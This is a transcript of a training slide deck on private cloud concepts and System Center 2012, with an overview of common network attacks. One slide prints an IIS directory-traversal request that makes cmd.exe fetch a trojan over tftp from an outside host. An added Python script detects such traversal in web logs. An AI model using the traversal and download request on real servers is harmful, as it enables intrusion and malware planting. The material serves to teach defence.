
Securing The Cloud

Securing The Cloud. Kevin King - Senior Technical Instructor ● Infrastructure/Cloud Consulting



Presentation Transcript


  1. Securing The Cloud Kevin King - Senior Technical Instructor ● Infrastructure/Cloud Consulting | MCT CCSI MCSE-Private Cloud MCSA MCSA-Server 2012 MCSE CCNA Data Center Cisco Quality Instructor 2014 New Horizons CLC | 6700 Jefferson, Building A | Albuquerque, NM 87109 p: 505.830.7100 | f: 505.830.2239 | kking@nhabq.com | www.nhabq.com What is the Cloud? How do you lock it down?

  2. Introduction to the Private Cloud Securing the Private Cloud

  3. Overview • Overview of the Cloud Computing Model • Requirements for the Private Cloud • Operating a Private Cloud Infrastructure with System Center • Securing the Cloud

  4. 1) Overview of the Cloud Computing Model • The Advent of Cloud Computing • Public vs. Private Clouds • Cloud Service Models • Methods to Implement the Private Cloud • System Center 2012 and the Private Cloud

  5. The Advent of Cloud Computing (diagram: Client/Server Architecture → Cloud Computing) Advantages of cloud computing include: • Virtualized data center • Reduced operational costs • Server consolidation • Improved resiliency and agility

  6. Public vs. Private Clouds Private cloud: • Provides more control • Is flexible • Is customizable • Has operational and management costs Public cloud: • Provides less control • Provides less flexibility • Provides less customization • Reduced operational and management costs

  7. Cloud Service Models The three cloud service models are: • Infrastructure as a Service (IaaS): includes server, storage, and network infrastructure • Software as a Service (SaaS): includes business processes and applications • Platform as a Service (PaaS): includes application execution services

  8. Methods to Implement the Private Cloud (chart: level of pre-integration, low to high, against deployment time, low to high; the three options plotted are Service Provider, Reference Architecture, and Custom)

  9. System Center 2012 and the Private Cloud System Center 2012 has the following components: • App Controller • Service Manager • Virtual Machine Manager (VMM) • Orchestrator • Operations Manager • Data Protection Manager (DPM) • Configuration Manager

  10. 2) Requirements for the Private Cloud • Key Business Requirements • Service Identification and Onboarding • Datacenter Administrators and Business Unit IT Administrators

  11. Key Business Requirements The key business requirements include: • Competitive advantage • Scalability • Reduced cost

  12. Service Identification and Onboarding • Service Identification: • Does the application need to reside in the same location as the data? • What computer resources are required? • What are the software or operating system requirements? • What network bandwidth will be required by the application between the users and the cloud? • Onboarding: • Has the service passed the identity check and is it ready for the cloud? • Have relevant backups taken place? • Has the migration been tested successfully in a pre-production or UAT environment? • Is there a documented method for fallback?

  13. Datacenter Administrators and Business Unit IT Administrators The datacenter administrator: • Manages the physical infrastructure • Manages the private cloud resources • Configures access to cloud resources The business unit IT administrator: • Manages the business unit cloud • Manages resources specific to the business unit cloud that they own

  14. 3) Operating a Private Cloud Infrastructure with System Center • Provisioning the Private Cloud with Virtual Machine Manager • Managing Public and Private Clouds with App Controller • Service Management with Service Manager • Automating Data Center Processes with Orchestrator

  15. Provisioning the Private Cloud with Virtual Machine Manager • A simple private cloud is created in Virtual Machine Manager by using the Create Cloud Wizard:

  16. Managing Public and Private Clouds with App Controller Using the App Controller Portal, you can manage private clouds that were created with VMM and public clouds that were created on the Windows Azure platform.

  17. Service Management with Service Manager Service Manager delivers an integrated platform for automating and adapting IT service management best practices to your organization's requirements. By using Service Manager, you can: • Reduce mean time to resolution of issues through a self-service user experience • Improve private cloud efficiency through centralized management of change processes • Provide self-service provisioning of private cloud resources • Implement compliance controls for the management of the private cloud infrastructure

  18. Automating Data Center Processes with Orchestrator Orchestrator provides a workflow management solution for the data center that allows you to automate the creation, monitoring, and deployment of resources in your environment. By using Orchestrator, you can: • Automate processes in your private cloud • Improve operational efficiency • Connect different systems from different vendors without knowledge of scripting languages

  19. 4) Securing the Private Cloud • Old days – security = planting two firewalls • Today – security = very complex problem

  20. Types of Attacks Including, but not limited to: • Packet sniffing— An application that uses the promiscuous mode of the network adapter to capture all network packets. • IP spoofing— An attack in which a hacker assumes another host's IP address to conceal their true identity. • Denial-of-service (DoS) attack— Aims to overwhelm a service so as to deny legitimate requests from being serviced. The service may be in the form of bandwidth, memory, or CPU. It is the most well-known of all Internet attacks, and efforts should be invested in understanding its mechanisms. Some of the more famous DoS attacks include the following: • Code Red • Blaster • Ping of Death • Trinity

  21. Types of attacks • Password attack— As its name implies, this attack intends to acquire passwords to important assets so as to cause further damage. Password attacks can be achieved through other methods previously mentioned, such as IP spoofing, or they can be achieved via brute force. • Man-in-the-middle attack— This type of attack happens when a hacker manages to position himself between the source and the destination of a network transaction. ARP cache poisoning is one common method. • Application attack— This type of attack happens when holes in application software are exploited to gain access to a computer system. The holes may be bugs or may be TCP port numbers that are exposed. • Port redirection attack— This type of attack makes use of a compromised host to gain access to a network that is otherwise protected. • Blue Pilling

  22. Sequence of attacks • After a phase of probing/scanning, the hacker detects a vulnerability in the web/application server • The hacker exploits the vulnerability to get a shell • For example: • Copy the Trojan to the web/application server: • HTTPS://www.example.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%2010.20.15.15%20GET%20trojan.exe%20trojan.exe
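The request on this slide works because `%c0%af` is an overlong UTF-8 encoding of `/` that a pre-decoding path check does not recognise. The following detection script is an added example, not part of the deck: it decodes such overlong forms, then flags any request whose normalized path contains a `..` segment, run over constructed IIS-style W3C log lines (the client addresses and all requests other than the slide's URL are made up for the example).

```python
from urllib.parse import unquote_to_bytes

# Constructed IIS W3C-style log lines: date time client-ip method uri-stem uri-query status.
# Client IPs are invented; the third request is the URL quoted on the slide.
SAMPLE_LOG = """\
2014-05-01 10:00:01 10.0.0.5 GET /default.htm - 200
2014-05-01 10:00:04 10.0.0.5 GET /docs/caf%C3%A9.htm - 200
2014-05-01 10:00:07 10.0.0.9 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+tftp%20-i%2010.20.15.15%20GET%20trojan.exe%20trojan.exe 200
2014-05-01 10:00:09 10.0.0.9 GET /scripts/../../winnt/system32/cmd.exe - 404
2014-05-01 10:00:12 10.0.0.7 GET /images/logo.png - 200
"""


def normalize_path(uri: str) -> str:
    """Percent-decode once, then fold overlong two-byte UTF-8 forms (lead byte C0/C1)
    back to the single ASCII byte they encode. %c0%af is an overlong '/', which a
    strict decoder rejects, so a check that ran before decoding never saw it."""
    raw = unquote_to_bytes(uri)
    fixed = bytearray()
    i = 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            fixed.append(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F))
            i += 2
        else:
            fixed.append(b)
            i += 1
    # Valid multi-byte UTF-8 (e.g. %C3%A9) still decodes normally; backslashes are
    # treated as path separators, as Windows does.
    return fixed.decode("utf-8", errors="replace").replace("\\", "/")


def is_traversal(uri: str) -> bool:
    """True when any segment of the normalized path is '..'."""
    path = normalize_path(uri).split("?", 1)[0]
    return ".." in path.split("/")


def scan_log(log_text: str) -> list[str]:
    """Return 'client-ip uri-stem' for each request whose decoded path climbs out of
    its directory; the raw stem is reported so the analyst sees the encoding used."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 7:
            continue
        client_ip, stem = fields[2], fields[4]
        if is_traversal(stem):
            hits.append(f"{client_ip} {stem}")
    return hits
```

A real deployment would feed the web server's access log into `scan_log` and alert on the returned client addresses.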

  23. Server Farm Security Strategies

  24. Segmenting the Server Farm

  25. Building the Firewall Ruleset

  26. From Physical Separation to Logical Separation

  27. Securing The Cloud System Center 2012 has the following components: • App Controller • Service Manager • Virtual Machine Manager (VMM) • Orchestrator • Operations Manager • Data Protection Manager (DPM) • Configuration Manager

  28. Surface Area

  29. Public vs. Private Clouds Physical: • Physical access to equipment • OOB Management • Password Policy • Host Security Logical: • System Center Components • Individual VMs • Services and Apps • Passwords/Encryption/Least Privilege
